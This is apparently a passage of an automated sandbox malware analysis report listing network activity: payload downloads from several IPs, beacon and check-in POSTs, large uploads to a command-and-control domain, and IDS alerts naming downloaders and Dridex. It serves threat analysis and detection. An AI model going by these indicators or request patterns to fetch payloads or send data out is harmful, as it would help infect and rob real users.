                            Source: global traffic | HTTP traffic detected: GET /testdef/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 38 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062128101&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /test/am_no.bat HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 39 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062129021&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: GET /defend/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062130001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /luma/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062131001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062132001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.115 | Connection: Keep-Alive | Cache-Control: no-cache
                            Source: global traffic | HTTP traffic detected: GET /well/random.exe HTTP/1.1 | Host: 185.215.113.16
                            Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHD | Host: 185.215.113.115 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 34 41 46 36 37 39 32 43 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a | Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="hwid"BD4AF6792CE23924696330------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build"kira------ECAKKKKJDBKKFIEBKEHD--
                            Source: global traffic | HTTP traffic detected: GET /defend/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 185.215.113.16 | Connection: Keep-Alive
                            Source: Joe Sandbox View | IP Address: 185.215.113.43
                            Source: Joe Sandbox View | IP Address: 185.215.113.97
                            Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                            Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49707 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49710 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49708 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49719 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49750 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49742 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49765 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53465 -> 91.240.118.49:443
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53467 -> 185.215.113.97:80
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53471 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53472 -> 185.215.113.97:80
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53473 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53476 -> 104.21.18.116:443
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53477 -> 185.215.113.97:80
                            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53478 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53480 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53481 -> 104.102.49.254:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53482 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53486 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53474 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53485 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53488 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53469 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53491 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53499 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53502 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53511 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53520 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53533 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53537 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53538 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53542 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53547 -> 185.215.113.97:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53548 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53550 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53546 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53564 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53565 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53580 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53579 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53591 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53592 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53597 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53608 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53622 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53621 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53626 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53623 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53630 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53631 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53635 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53634 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53638 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53640 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53643 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53632 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.11:53646 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53650 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53653 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53656 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53657 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53663 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53666 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53660 -> 172.67.139.144:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53669 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53671 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53673 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53675 -> 104.21.18.116:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53465 -> 91.240.118.49:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53502 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53511 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53538 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53548 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53550 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53533 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53546 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53564 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53579 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53542 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53592 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53597 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53621 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53635 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53632 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53646 -> 176.113.115.96:443
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:53630 -> 176.113.115.96:443
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GDZPI1XHQJDX14IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12829Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EHLNGF5VFERUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15017Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BCE55BQJBG1ZL73LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20416Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U0XWM9AD26RD2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2426Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7BPC83KRGSNKIHFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588208Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EVU8EA1RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12785Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O38WLJR28CZIW3RHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15045Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R6LQVY1XWCBGEFMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2ED95NIE9C0BCKE87YCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2504Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I5RBDZIJSDGKTM8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589150Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81729326be8e843a8f51f8a95b5cc212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43384d0d0915c41cd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38c926d19fe6595cd66946851e91fcd85241ab258d81729326be8e843a8f51f8a95b5cc212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d43384d0d0915c41cd HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38d926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38a926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38b926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb388926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb389926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb386926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb387926d19fe6595cd66946951e91fcd852208ea1add05672e26e1fd09b4a142c9c4e9976278d7f1449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d597554ccb7535f0d9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab942463b774fe6a0231678fbb38f842a1cec7a86d87bdb6546ad12dac0290aee18d71b29366be8ef43a8ec4cdc8eec906920dff157d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935e40cd7231f8d402 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
